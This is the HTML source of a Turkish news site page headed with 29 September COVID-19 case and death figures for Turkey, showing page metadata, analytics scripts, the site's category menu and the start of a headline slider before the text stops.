<!DOCTYPE html>

<html lang="tr" class="no-inlinesvg sayfa-haber">

<head>
<meta name="yandex-verification" content="d3ee4e2617e0d9f3" />
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu? - Kamu Saati</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="29 Eylül Çarşamba virüs vaka sayısı kaç? vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son" />
<meta name="keywords" content="" />
<meta name="news_keywords" content="" />
<meta name="robots" content="noodp"/>
<meta name="author" content="Kamu Saati" />
<meta property="fb:admins" content="100004451415770" /><meta property="og:type" content="article" />
<meta property="og:site_name" content="Kamu Saati">
<meta property="og:title" content="29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu? - Kamu Saati">
<meta property="og:description" content="29 Eylül Çarşamba virüs vaka sayısı kaç? vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son">
<meta property="og:url" content="https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html">
<meta property="og:image" content="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg">
<meta property="og:image" content="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg" />
  <meta property="og:type" content="article">
<meta http-equiv="refresh" content="300">
<meta name="twitter:card" content="summary_large_image">
<meta name="og:title" content="29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?">
<meta name="twitter:url" content="http://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html">
<meta name="twitter:domain" content="https://www.kamusaati.com/">
<meta name="twitter:site" content="kamusaaticom">
<meta name="twitter:title" content="29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?">
<meta name="whatsapp:image:src" content="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg">
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="twitter:description" content="29 Eylül Çarşamba virüs vaka sayısı kaç? vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son">
<meta name="twitter:image:src" content="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg">
<script src="/cdn-cgi/apps/head/btTCWaoQcpcksw8hW3PfHUIsoCc.js"></script><link rel="alternate" href="https://www.kamusaati.com/m/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html" hreflang="tr" media="only screen and (max-width: 640px)" />
<!-- =[Favicon]= -->
<link rel="shortcut icon" href="https://www.kamusaati.com/_themes/hs-royal/images/favicon.ico"><link rel="canonical" href="https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html">

 <!-- ==[Fonts]== -->
<link href='//fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='//fonts.googleapis.com/css?family=Open+Sans:600,700,400&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.kamusaati.com/_themes/hs-royal/style/print.css" rel="stylesheet">
<link href="https://www.kamusaati.com/_themes/hs-royal/style/compress.css" rel="stylesheet" />
<link href="https://www.kamusaati.com/_themes/hs-royal/style/renk.css" rel="stylesheet"/>
<link rel="image_src" type="image/jpeg" href="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg" />
<meta name="google-play-app" content="app-id=com.tebilisim.android.kamusaati"><link rel="stylesheet" href="https://www.kamusaati.com/_themes/hs-royal/style/jquery.smartbanner.css" type="text/css" media="screen">


<meta name="dc.language" content="tr">
<meta name="dc.source" content="https://www.kamusaati.com/">
<meta name="dc.title" content="29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu? - Kamu Saati">
<meta name="dc.keywords" content="">
<meta name="dc.description" content="29 Eylül Çarşamba virüs vaka sayısı kaç? vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son">

<link rel="dns-prefetch" href="//www.kamusaati.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="dns-prefetch" href="//fonts.gstatic.com">
<link rel="dns-prefetch" href="//mc.yandex.ru" alt="yandex">
<link rel="dns-prefetch" href="//fonts.googleapis.com">
<link rel="dns-prefetch" href="//pagead2.googlesyndication.com">
<link rel="dns-prefetch" href="//googleads.g.doubleclick.net">
<link rel="dns-prefetch" href="//google.com">
<link rel="dns-prefetch" href="//gstatic.com">
<link rel="dns-prefetch" href="//connect.facebook.net">
<link rel="dns-prefetch" href="//graph.facebook.com">
<link rel="dns-prefetch" href="//linkedin.com">
<link rel="dns-prefetch" href="//ap.pinterest.com">




<!--[if IE 7]>
<style type="text/css">
    .reklam.dikey.sol .fixed {
        margin-left:-300px;
    }
</style>
<![endif]-->


<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
	<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
	<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->



<script type="text/javascript">
var site_url   = 'https://www.kamusaati.com/',
tema       = 'hs-royal',
theme_path = 'https://www.kamusaati.com/_themes/hs-royal/',
ajax_url   = '_ajax/',
hava   = '1',
hava_default   = 'TUXX0002',
namaz   = '0',
namaz_default   = 'ankara',
comment_approved = '0',
popup_saat = '1',
umanset   = '1',
tema = 'hs-royal',
surum = '1.0.9',
sistem = '5.9.3',
slayt_ayar   = 5000,
youtube_ch = 'UCcDbuYItq1cY_1ITKBAv5Jg',
uye_gir = 'Giriş Yap',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Bağlan',
sifremi_unuttum = 'Şifremi Unuttum?',
devamini_oku = 'Devamını Oku...',
gizle = 'Gizle',
hs_goster = 'Göster',
hs_gizle = 'Gizle',
hs_data_table = '//service.tebilisim.com/puandurumu_json.php',
manset_tipi= 'numarali',
analitik_ga = 'UA-89464456-1';
</script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-86740744-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-86740744-2');
</script>

<meta name="google-site-verification" content="8z0298yfnXSExIhzjapmXXzEMoFNETUPugExkp7sAjA" />
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-86740744-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-86740744-2');
</script></head>
<body>
<!--Header başlangıç-->
<nav class="navbar navbar-default navbar-fixed-top">
  <div class="container center ">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle toggle-menu menu-left push-body pull-left jPushMenuBtn" data-toggle="collapse" data-target="#nav-menu">
        <i class="fa fa-bars fa-fw"></i>
      </button>
          <a class="navbar-brand" href="https://www.kamusaati.com/">
            <img src="https://www.kamusaati.com/images/banner/652.png" alt="Kamu Haber Memurlar İşçi Memur Personel Alımı İş İlanları Kamusaati" class="img-responsive" />
          </a>
    </div>
    <div class="navbar-collapse collapse cbp-spmenu cbp-spmenu-vertical cbp-spmenu-left" id="nav-menu">
      <ul class="nav navbar-nav">
        <!--mobil arama başlangıç-->
        <li class="row visible-xs">
          <form action="https://www.kamusaati.com/" method="get" class="navbar-form navbar-left">
            <input type="hidden" name="m" value="arama">
                                            
            <div class="input-group">
              <input type="search" name="q" class="form-control input-sm" placeholder="Haber Ara..">
                <input type="hidden" name="auth" value="e3f653795ddcff14634a7f204c074bd0ad8c2447" />
              <div class="input-group-btn">
                <button type="submit" class="btn btn-danger">
                  <span class="fa fa-search"></span>
                </button>
              </div>
            </div>
          </form>
        </li>
        <!--mobil arama başlangıç-->
        <!--Menüler başlangıç-->
        <li >
          <a href="https://www.kamusaati.com/">
            <i class="fa fa-home"></i>
            <span class="visible-xs">Anasayfa</span>
          </a>
        </li>
        <li class="dropdown">
          <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown" data-hover="dropdown">
            <i class="fa fa-th-list fa-fw"></i>
            <span class="hidden-sm hidden-md">Kategoriler</span>
            <b class="caret"></b>
          </a>
          <!-- Burası Mobilde Gözükecek -->
          <ul class="dropdown-menu visible-xs">
              <li><a href="https://www.kamusaati.com/resmi-gazete/">Resmi Gazete</a></li>
<li><a href="https://www.kamusaati.com/ogretmenler-ve-meb-personelleri/">Öğretmenler ve Meb Personelleri</a></li>
<li><a href="https://www.kamusaati.com/teog-haberleri/">TEOG Haberleri</a></li>
<li class="active"><a href="https://www.kamusaati.com/gundem/">Gündem</a></li>
<li><a href="https://www.kamusaati.com/kose-yazisi/">Köşe Yazısı</a></li>
<li><a href="https://www.kamusaati.com/personel-alimi/">Personel Alımı</a></li>
<li><a href="https://www.kamusaati.com/memurlar/">Memurlar</a></li>
<li><a href="https://www.kamusaati.com/egitim-haberleri/">Eğitim Haberleri</a></li>
<li><a href="https://www.kamusaati.com/atama-haberleri/">Atama Haberleri</a></li>
<li><a href="https://www.kamusaati.com/sinav-haberleri/">Sınav Haberleri</a></li>
<li><a href="https://www.kamusaati.com/secim-haberleri/">Seçim Haberleri</a></li>
<li><a href="https://www.kamusaati.com/ogretmen-atamalari/">Öğretmen Atamaları</a></li>
<li><a href="https://www.kamusaati.com/saglik-personelleri/">Sağlık Personelleri</a></li>
<li><a href="https://www.kamusaati.com/akademik-personel-haberleri/">Akademik Personel Haberleri</a></li>
<li><a href="https://www.kamusaati.com/emekli-haberleri/">Emekli Haberleri</a></li>
<li><a href="https://www.kamusaati.com/magazin-haberleri/">Magazin Haberleri</a></li>
<li><a href="https://www.kamusaati.com/asayis-haberleri/">Asayiş Haberleri</a></li>
<li><a href="https://www.kamusaati.com/adalet-personeli/">Adalet Personeli</a></li>
<li><a href="https://www.kamusaati.com/diyanet-haberleri/">Diyanet Haberleri</a></li>
<li><a href="https://www.kamusaati.com/belediye-personeli/">Belediye Personeli</a></li>
<li><a href="https://www.kamusaati.com/isci-haberleri/">İşçi Haberleri</a></li>
<li><a href="https://www.kamusaati.com/dunyadan-haberler/">Dünyadan Haberler</a></li>
<li><a href="https://www.kamusaati.com/turkiye-haberleri/">Türkiye Haberleri</a></li>
<li><a href="https://www.kamusaati.com/kpss-haberleri/">KPSS Haberleri</a></li>
<li><a href="https://www.kamusaati.com/emniyet-personeli/">Emniyet Personeli</a></li>
<li><a href="https://www.kamusaati.com/askeri-personel/">Askeri Personel</a></li>
<li><a href="https://www.kamusaati.com/saglik-haberleri/">Sağlık Haberleri</a></li>
<li><a href="https://www.kamusaati.com/ozel-dosya/">Özel Dosya</a></li>
<li><a href="https://www.kamusaati.com/sendika/">Sendika</a></li>
<li><a href="https://www.kamusaati.com/ekonomi-haberleri/">Ekonomi Haberleri</a></li>
<li><a href="https://www.kamusaati.com/haberler/">Haberler</a></li>
<li><a href="https://www.kamusaati.com/sgk-haberleri/">SGK Haberleri</a></li>
<li><a href="https://www.kamusaati.com/siyaset-haberleri/">Siyaset Haberleri</a></li>
<li><a href="https://www.kamusaati.com/spor-haberleri/">Spor Haberleri</a></li>
<li><a href="https://www.kamusaati.com/son-dakika-haberleri/">Son Dakika Haberleri</a></li>
<li><a href="https://www.kamusaati.com/teknoloji-haberleri/">Teknoloji Haberleri</a></li>
<li><a href="https://www.kamusaati.com/spor/">Spor</a></li>
<li><a href="https://www.kamusaati.com/saglik/">Sağlık</a></li>
<li><a href="https://www.kamusaati.com/politika/">Politika</a></li>
<li><a href="https://www.kamusaati.com/genel/">Genel</a></li>
<li><a href="https://www.kamusaati.com/ekonomi/">Ekonomi</a></li>
<li><a href="https://www.kamusaati.com/bilim-teknoloji/">Bilim, Teknoloji</a></li>
<li><a href="https://www.kamusaati.com/kultur-sanat/">KÜLTÜR-SANAT</a></li>
<li><a href="https://www.kamusaati.com/formasyon-haberleri/">Formasyon Haberleri</a></li>
<li><a href="https://www.kamusaati.com/medya/">Medya</a></li>
<li><a href="https://www.kamusaati.com/yok-haberleri/">YÖK Haberleri</a></li>
<li><a href="https://www.kamusaati.com/universite-haberleri/">Üniversite Haberleri</a></li>
<li><a href="https://www.kamusaati.com/ilan-saati/">İLAN SAATİ</a></li>
<li><a href="https://www.kamusaati.com/sibelin-mutfagi/">Sibelin Mutfağı</a></li>
<li><a href="https://www.kamusaati.com/lgs-haberleri/">LGS Haberleri</a></li>
            <!-- Kategori Liste sayfası olmadığı için burada bütün kategoriler listelenecek. -->
          </ul>
          <!-- // Burası Mobilde Gözükecek -->
          <!-- Burası Mobilde Gözükmeyecek -->
          <div class="dropdown-menu hidden-xs">
            <div class="row">
              <div class="col-sm-2">
                <ul class="nav nav-pills nav-stacked" role="tablist" data-toggle="tab-hover">
                  <li class="active"><a href="#resmi-gazete" onclick="window.open('https://www.kamusaati.com/resmi-gazete'); return false;" role="tab" data-url="143" data-toggle="tab">Resmi Gazete</a></li>
<li><a href="#ogretmenler-ve-meb-personelleri" onclick="window.open('https://www.kamusaati.com/ogretmenler-ve-meb-personelleri'); return false;" role="tab" data-url="103" data-toggle="tab">Öğretmenler ve Meb Personelleri</a></li>
<li><a href="#teog-haberleri" onclick="window.open('https://www.kamusaati.com/teog-haberleri'); return false;" role="tab" data-url="146" data-toggle="tab">TEOG Haberleri</a></li>
<li><a href="#gundem" onclick="window.open('https://www.kamusaati.com/gundem'); return false;" role="tab" data-url="141" data-toggle="tab">Gündem</a></li>
<li><a href="#kose-yazisi" onclick="window.open('https://www.kamusaati.com/kose-yazisi'); return false;" role="tab" data-url="144" data-toggle="tab">Köşe Yazısı</a></li>
<li><a href="#personel-alimi" onclick="window.open('https://www.kamusaati.com/personel-alimi'); return false;" role="tab" data-url="132" data-toggle="tab">Personel Alımı</a></li>
<li><a href="#memurlar" onclick="window.open('https://www.kamusaati.com/memurlar'); return false;" role="tab" data-url="80" data-toggle="tab">Memurlar</a></li>
<li><a href="#egitim-haberleri" onclick="window.open('https://www.kamusaati.com/egitim-haberleri'); return false;" role="tab" data-url="77" data-toggle="tab">Eğitim Haberleri</a></li>
<li><a href="#atama-haberleri" onclick="window.open('https://www.kamusaati.com/atama-haberleri'); return false;" role="tab" data-url="76" data-toggle="tab">Atama Haberleri</a></li>
<li class="dropdown"><a href="https://www.kamusaati.com/#othercat" role="tab" data-url="-1" data-toggle="tab" >Diğer Kategoriler</a></li>
                </ul>
              </div>
              <div class="col-sm-10">
                <div class="tab-content">
                  <!--Haber Kategori İçeriği-->
                  <div role="tabpanel" class="tab-pane active cat0" id="resmi-gazete">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="ogretmenler-ve-meb-personelleri">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="teog-haberleri">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="gundem">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="kose-yazisi">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="personel-alimi">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="memurlar">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="egitim-haberleri">
                  </div>
                  <div role="tabpanel" class="tab-pane" id="atama-haberleri">
                  </div>
                                    <!--Haber Kategori İçeriği-->
                      
                          <div role="tabpanel" class="tab-pane" id="othercat">
                            <div class="btn-group item"><a href="https://www.kamusaati.com/sinav-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sınav Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/secim-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Seçim Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ogretmen-atamalari" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Öğretmen Atamaları</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/saglik-personelleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sağlık Personelleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/akademik-personel-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Akademik Personel Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/emekli-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Emekli Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/magazin-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Magazin Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/asayis-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Asayiş Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/adalet-personeli" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Adalet Personeli</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/diyanet-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Diyanet Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/belediye-personeli" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Belediye Personeli</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/isci-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> İşçi Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/dunyadan-haberler" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Dünyadan Haberler</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/turkiye-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Türkiye Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/kpss-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> KPSS Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/emniyet-personeli" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Emniyet Personeli</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/askeri-personel" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Askeri Personel</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/saglik-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sağlık Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ozel-dosya" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Özel Dosya</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/sendika" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sendika</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ekonomi-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Ekonomi Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/haberler" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Haberler</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/sgk-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> SGK Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/siyaset-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Siyaset Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/spor-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Spor Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/son-dakika-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Son Dakika Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/teknoloji-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Teknoloji Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/spor" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Spor</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/saglik" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sağlık</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/politika" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Politika</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/genel" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Genel</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ekonomi" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Ekonomi</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/bilim-teknoloji" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Bilim, Teknoloji</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/kultur-sanat" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> KÜLTÜR-SANAT</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/formasyon-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Formasyon Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/medya" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Medya</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/yok-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> YÖK Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/universite-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Üniversite Haberleri</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/ilan-saati" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> İLAN SAATİ</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/sibelin-mutfagi" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> Sibelin Mutfağı</a></div><div class="btn-group item"><a href="https://www.kamusaati.com/lgs-haberleri" class="btn btn-info btn-icon-left btn-sm"  target="_blank"><i class="fa fa-tag"></i> LGS Haberleri</a></div>                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <!-- Burası Mobilde Gözükmeyecek -->
                </li>
                                                                <li >
                  <a href="https://www.kamusaati.com/yazarlar/" target="_blank">
                    <i class="fa fa-users fa-fw"></i>
                    <span class="hidden-sm hidden-md">Yazarlar</span>
                  </a>
                </li>
                                                                                                <li class="hidden-sm hidden-md hidden-lg">
                  <a href="https://www.kamusaati.com/kunye.html">
                    <i class="fa fa-info-circle fa-fw"></i>
                    <span class="hidden-sm hidden-md">Künye</span>
                  </a>
                </li>
                <li class="hidden-sm hidden-md hidden-lg">
                  <a href="https://www.kamusaati.com/iletisim.html">
                    <i class="fa fa-phone fa-fw"></i>
                    <span class="hidden-sm hidden-md">İletişim</span>
                  </a>
                </li>
              </ul>
              <ul class="nav navbar-nav navbar-right">
                <!--desktop arama başlangıç-->
                <li class="dropdown hidden-xs">
                  <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">
                    <i class="fa fa-search fa-fw"></i>
                  </a>
                  <div class="dropdown-menu">
                    <form action="https://www.kamusaati.com/" method="get" class="navbar-form">
                      <input type="hidden" name="m" value="arama">
                                                                  <div class="input-group">
                        <input type="search" name="q" id="search" class="form-control" placeholder="Haber Ara...">
                        <input type="hidden" name="auth" value="e3f653795ddcff14634a7f204c074bd0ad8c2447" />
                        <span class="input-group-btn">
                          <button type="submit" class="btn btn-danger">Ara</button>
                        </span>
                      </div>
                    </form>
                  </div>
                </li>
                <!--desktop arama bitiş-->
                <li class="dropdown">
                  <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">
                    <i class="fa fa-user fa-fw"></i>
                    <span class="visible-xs">Üyelik</span>
                  </a>
                  <ul id="memberArea" class="dropdown-menu">
               </ul>
                </li>
                                <!--Menüler bitiş-->
              </ul>
            </div>
          </div>
        </nav>
<!--Header bitiş-->
        <main style="margin-top:68px;" class="container center ">
        <!--Üst Manşet-->
<div class="umanset col-sm-12 col-xs-12 no-pd" style="margin-bottom: 10px;">
	<div class="swiper-container">
		<div class="swiper-wrapper">
							<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/2021-eylul-ayi-personel-alimi-ve-is-ilanlari-binlerce-kpss-li-kpss-siz-memur-ve-isci-alimi-guncellendi-h47980.html" onclick="window.open('https://www.kamusaati.com/gundem/2021-eylul-ayi-personel-alimi-ve-is-ilanlari-binlerce-kpss-li-kpss-siz-memur-ve-isci-alimi-guncellendi-h47980.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/2021_haziran_ayi_personel_alimi_ve_is_ilanlari_binlerce_kpss_li_kpss_siz_memur_ve_isci_alimi_guncellendi_h46364_13432_1.png" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/ise-iade-sonucunda-ise-baslatilmayan-isci-hangi-odemeleri-alir-h47979.html" onclick="window.open('https://www.kamusaati.com/gundem/ise-iade-sonucunda-ise-baslatilmayan-isci-hangi-odemeleri-alir-h47979.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/1.jpg" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/yargitay-dogum-iznini-uzatip-ise-gitmeyen-calisani-haksiz-buldu-h47976.html" onclick="window.open('https://www.kamusaati.com/gundem/yargitay-dogum-iznini-uzatip-ise-gitmeyen-calisani-haksiz-buldu-h47976.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/329300.jpg" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/askeri-personel/2021-yili-astsubay-ve-uzman-erbaslar-ne-kadar-emekli-maasi-aliyor-iste-o-tablo-h47783.html" onclick="window.open('https://www.kamusaati.com/askeri-personel/2021-yili-astsubay-ve-uzman-erbaslar-ne-kadar-emekli-maasi-aliyor-iste-o-tablo-h47783.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/otomobilde_otv_duzenlemesi_iste_yeni_otv_oranlari_h19671_20843.jpg" class="img-responsive center-block" alt="askeri personel">
														<figcaption class="small-caption">
								<div class="title one-line">askeri personel</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/isci-haberleri/iscilerin-yillik-izin-hakki-engellenebilir-mi-fazla-mesaide-personelin-istegi-aranir-mi-h47782.html" onclick="window.open('https://www.kamusaati.com/isci-haberleri/iscilerin-yillik-izin-hakki-engellenebilir-mi-fazla-mesaide-personelin-istegi-aranir-mi-h47782.html'); return false;">
